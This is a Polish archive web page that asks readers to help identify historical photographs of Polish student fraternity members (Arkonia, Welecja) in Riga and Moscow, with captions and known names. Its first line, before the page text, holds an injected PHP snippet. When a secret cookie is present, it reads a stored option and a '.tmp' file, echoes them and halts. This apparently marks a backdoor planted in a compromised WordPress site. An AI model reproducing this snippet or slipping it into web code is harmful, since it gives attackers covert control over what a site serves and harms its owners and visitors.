if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

Identyfikacja fotografii z Rygi

Od 2009 r. prezentowane są na stronach Archiwum Korporacyjnego fotografie, a szerzej także inne materialne ślady po korporacjach akademickich, które nie zostały dotychczas zidentyfikowane bądź szczegółowo opisane (vide Identyfikacja fotografii). Celem akcji jest uzupełnienie możliwie wielu brakujących informacji.

Wiele nieopisanych bądź nie w pełni opisanych fotografii znajduje się na niemal wszystkich stronach wirtualnego Muzeum Polskich Korporacji Akademickich. Od 2010 r. dodatkowo niektóre z nich oraz wiele innych nieopisanych fotografii prezentowane są w osobnych działach tworzonych zbiorczo dla identyfikacji fotografii korporacyjnych z jednego ośrodka akademickiego (Identyfikacja fotografii z Wilna, Identyfikacja fotografii z Warszawy, Identyfikacja fotografii z Lublina etc). Fotografie i insygnia korporacyjne, w przypadku których nie można określić ośrodka akademickiego, z którego pochodzą, można zobaczyć w zbiorczym zestawieniu - Identyfikacja fotografii.

Zależałoby nam na ustaleniu możliwie wielu istotnych dla opisu fotografii (bądź innych pamiątek) faktów, w szczególności nazwy korporacji ze zdjęcia, osoby/osób na nim przedstawionych, miejsca i czasu wykonania fotografii. Będziemy wdzięczni za wszelkie informacje, sugestie i przypuszczenia odnośnie prezentowanych zdjęć i innych pamiątek korporacyjnych (vide Kontakt).

Korporant z Rygi, lata 80/90-te XIX wieku.

1.1. Korporant z Rygi w latach 80/90-tych XIX wieku.

Fotografia przedstawia polskiego korporanta z Rygi, prawdopodobnie członka Arkonii bądź Welecji. Istotne byłoby określenie tożsamości osoby na zdjęciu, jak także daty wykonania fotografii.

Korporant z Rygi, lata 80/90-te XIX wieku.

1.2. Korporant z Rygi w latach 80/90-tych XIX wieku II.

Fotografia przedstawia polskiego korporanta z Rygi, prawdopodobnie członka Arkonii bądź Welecji. Istotne byłoby określenie tożsamości osoby na zdjęciu, jak także daty wykonania fotografii.

Korporant z Rygi, lata 80/90-te XIX wieku.

1.3. Korporant z Rygi w latach 80/90-tych XIX wieku III.

Fotografia przedstawia polskiego korporanta z Rygi, prawdopodobnie członka Arkonii bądź Welecji. Istotne byłoby określenie tożsamości osoby na zdjęciu, jak także daty wykonania fotografii.

Polak w Rydze, lata 80/90-te XIX wieku.

1.4. Polak w Rydze (być może korporant) w latach 80/90-tych XIX wieku I.

Fotografia przedstawia Polaka w Rydze, być może członka Arkonii bądź Welecji. Istotne byłoby określenie tożsamości osoby na zdjęciu, jak także daty wykonania fotografii.

Polak w Rydze, lata 80/90-te XIX wieku.

1.5. Polak w Rydze (być może korporant) w latach 80/90-tych XIX wieku II.

Fotografia przedstawia Polaka w Rydze, być może członka Arkonii bądź Welecji. Istotne byłoby określenie tożsamości osoby na zdjęciu, jak także daty wykonania fotografii.

Polak w Rydze, lata 80/90-te XIX wieku.

1.6. Polak w Rydze (być może korporant) w latach 80/90-tych XIX wieku IV.

Fotografia przedstawia Polaka w Rydze, być może członka Arkonii bądź Welecji. Istotne byłoby określenie tożsamości osoby na zdjęciu, jak także daty wykonania fotografii.

Polak w Rydze, lata 80/90-te XIX wieku.

1.7. Polak w Rydze (być może korporant) w latach 80/90-tych XIX wieku V.

Fotografia przedstawia Polaka w Rydze, być może członka Arkonii bądź Welecji. Istotne byłoby określenie tożsamości osoby na zdjęciu, jak także daty wykonania fotografii.

Polak w Rydze, lata 80/90-te XIX wieku.

1.8. Polak w Rydze (być może korporant) w latach 80/90-tych XIX wieku VI.

Fotografia przedstawia Polaka w Rydze, być może członka Arkonii bądź Welecji. Istotne byłoby określenie tożsamości osoby na zdjęciu, jak także daty wykonania fotografii.

Polak w Rydze, lata 80/90-te XIX wieku.

1.9. Polak w Rydze (być może korporant) w latach 80/90-tych XIX wieku VII.

Fotografia przedstawia Polaka w Rydze, być może członka Arkonii bądź Welecji. Istotne byłoby określenie tożsamości osoby na zdjęciu, jak także daty wykonania fotografii.

Polak w Rydze, lata 80/90-te XIX wieku.

1.10. Polak w Rydze (być może korporant) w latach 80/90-tych XIX wieku VIII.

Fotografia przedstawia Polaka w Rydze, być może członka Arkonii bądź Welecji. Istotne byłoby określenie tożsamości osoby na zdjęciu, jak także daty wykonania fotografii.

Polak w Rydze, lata 80/90-te XIX wieku.

1.11. Polak w Rydze (być może korporant) w latach 80/90-tych XIX wieku IX.

Fotografia przedstawia Polaka w Rydze, być może członka Arkonii bądź Welecji. Istotne byłoby określenie tożsamości osoby na zdjęciu, jak także daty wykonania fotografii.

Polak w Rydze, lata 80/90-te XIX wieku.

1.12. Polak w Rydze (być może korporant) w latach 80/90-tych XIX wieku X.

Fotografia przedstawia Polaka w Rydze, być może członka Arkonii bądź Welecji. Istotne byłoby określenie tożsamości osoby na zdjęciu, jak także daty wykonania fotografii.

Polak w Rydze, lata 80/90-te XIX wieku.

1.13. Polak w Rydze o inicjałach prawdopodobnie “S.K.” (być może korporant) w latach 80/90-tych XIX wieku XI.

Fotografia przedstawia Polaka w Rydze, być może członka Arkonii bądź Welecji. Istotne byłoby określenie tożsamości osoby na zdjęciu, jak także daty wykonania fotografii.

_________________________________________________________________________________________

Arkoni, 1900 r.

2.0. Coetus Arkonii w roku 1900

Archiwum Korporacyjne wzbogaciło się o ciekawe zdjęcie. Fotografia przedstawia grupę Arkonów, kolegów przyjętych do Arkonii w 1900 r. (w semestrze zimowym 1900/01 ?), prawdopodobnie w towarzystwie oldermana Juliana Matłaszyńskiego.

Zgodnie z opisem pod zdjęciem: od lewej stoją: Bronisław Chudzyński, Eryk Węcławowicz, Jan Oskierka, Adam Ronikier, Marian Baehr, siedzą od lewej: na murku Władysław Trzeciak (bądź Władysław Kontowt), Tomasz Andrycz, olderman (?) Julian Matłaszyński, Karol Lipkowski, Julian Przybytko (?), siedzą na podłodze od lewej: Władysław Kontowt (?), Tomasz Jarnuszkiewicz, Jan Pawłowicz.

W powyższym opisie wymieniono 13 osób, a na fotografii widocznych jest jedynie 12 korporantów. Na podstawie innych fotografii można potwierdzić prawidłowość opisu w odniesieniu do Adama Ronikiera i Mariana Baehra. Dość prawdopodobne wydaje się, że dwa najwyższe rzędy opisano prawidłowo, w tym osobę Karola Lipkowskiego. Być może błąd wkradł się do opisu najniższego rzędu, gdzie podano trzy osoby, a na fotografii widoczne są dwie. Bylibyśmy wdzięczni za pomoc w wyjaśnieniu tej zagadki.

Czterej Arkoni, Ryga 8 IV 1909 r.

2.1. Czterej Arkoni w 1909 r.

Fotografia przedstawia grupę czterech członków ryskiej Arkonii. Istotne byłoby określenie tożsamości osób na zdjęciu.

Arkoni przed menzurą Teofila Siewruka, Ryga 1910 r.

2.2. Arkoni 1910 r.

Fotografia przedstawia grupę członków Arkonii przed menzurą Teofila Siewruka. Istotne byłoby określenie tożsamości osób na zdjęciu, jak także dziennej daty wykonania fotografii.

Arkoni po menzurze Kazimierza Strawińskiego, Ryga 1911 r.

2.3. Arkoni 1911 r.

Fotografia przedstawia grupę członków Arkonii świętujących po menzurze Kazimierza Strawińskiego. Istotne byłoby określenie tożsamości osób na zdjęciu, jak także dziennej daty wykonania fotografii.

Arkoni, Ryga maj 1914 r.

2.4. Arkoni w maju 1914 r.

Fotografia przedstawia grupę członków Arkonii w maju 1914 r. Istotne byłoby określenie tożsamości osób na zdjęciu, jak także dziennej daty wykonania fotografii.

Arkoni, Ryga 1 V 1911 r.

2.5. Arkoni w dorożce 1911 r.

Fotografia przedstawia grupę członków Arkonii w dorożce w 1911 r. Istotne byłoby określenie tożsamości osób na zdjęciu.

Arkoni, Ryga 1 V 1911 r.

2.6. Arkoni na schodach 1911 r.

Fotografia przedstawia grupę członków Arkonii na schodach w 1911 r. Istotne byłoby określenie tożsamości osób na zdjęciu.

Bufet na kwaterze Arkoni, Ryga 1911 r.

2.7. Bufet na kwaterze Arkoni, 1911 r.

Fotografia przedstawia bufet na kwaterze Arkonii w 1911 r. Istotne byłoby określenie tożsamości osób na zdjęciu, jak także dziennej daty wykonania fotografii.

Dwóch studentów, prawd. członków Arkonii, ok. 1911 r.

2.8. Dwóch studentów, prawd. członków Arkonii, ok. 1911 r.

Fotografia przedstawia dwóch studentów, prawd. członków Arkonii. Istotne byłoby określenie tożsamości osób na zdjęciu, jak także dziennej daty wykonania fotografii.

Arkon, ok. 1911 r.

2.9. Arkon, ok. 1911 r.

Fotografia przedstawia Arkona grającego w tenisa. Istotne byłoby określenie tożsamości osoby na zdjęciu, jak także miejsca i dziennej daty wykonania fotografii.

Arkon-Laudanin, 1929 r.

2.10. Arkon-Laudanin, 1929 r.

Fotografia przedstawia Arkona, Filistra kowieńskiej Laudy, na komersie Laudy w 1929 r. Istotne byłoby określenie tożsamości osoby na zdjęciu.

Arkon-Laudanin, 1938 r.

2.11. Arkon-Laudanin I, 1938 r.

Fotografia przedstawia Arkona, Filistra kowieńskiej Laudy, na komersie Laudy w 1938 r. Istotne byłoby określenie tożsamości osoby na zdjęciu.

Arkon-Laudanin, 1938 r.

2.12. Arkon-Laudanin II, 1938 r.

Fotografia przedstawia Arkona, Filistra kowieńskiej Laudy, na komersie Laudy w 1938 r. Istotne byłoby określenie tożsamości osoby na zdjęciu.

_________________________________________________________________________________________

Weleci, od lewej: NN, stoi Włodzimierz Ślosarski, NN, NN, siedzi Henryk Kłodecki, Ryga ok. 1900 r.

3.1. Weleci w Rydze.

Fotografia przedstawia grupę członków Korporacji Welecja w Rydze. Na fotografii widoczni są m.in. Włodzimierz Ślosarski i Henryk Kłodecki. Istotne byłoby określenie tożsamości pozostałych osób na zdjęciu, jak także roku wykonania fotografii.

Weleci, od lewej: Jerzy Ciszewski, NN, NN, Ryga 1896 r.

3.2. Weleci w Rydze.

Fotografia przedstawia grupę członków Korporacji Welecja w Rydze. Na fotografii widoczny jest Jerzy Ciszewski. Istotne byłoby określenie tożsamości dwóch pozostałych osób na zdjęciu.

Członek Welecji, Ryga 1895 r.

3.3. Członek Welecji w Rydze w 1895 r.

Fotografia przedstawia członka Korporacji Welecja w Rydze. Istotne byłoby określenie tożsamości osoby na zdjęciu.

Członek Welecji w Rydze, być może Henryk Genello (?).

3.4. Członek Welecji w Rydze, być może Henryk Genello (?).

Fotografia przedstawia członka Korporacji Welecja w Rydze, być może Henryka Genello (por. Welecja). Istotne byłoby potwierdzenie (określenie) tożsamości osoby na zdjęciu.

(…) Rothert (?), 1915 r.

3.5. Weleci w Moskwie.

Fotografia przedstawia grupę członków Korporacji Welecja w Moskwie. Zgodnie z opisem na odwrocie fotografii, widoczni są na niej: Bohdan Połoński, Witold Jeśman, Jan Łusakowski, a także bez podania imienia “Rothert”. Istotne byłoby potwierdzenie tożsamości osób na zdjęciu oraz ustalenie imienia Rotherta.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 12 X 2010 r.
Ostatnia zmiana: 22 IX 2013 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Identyfikacja fotografii z Rygi, (na:) www.archiwumkorporacyjne.pl, stan 22 IX 2013 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }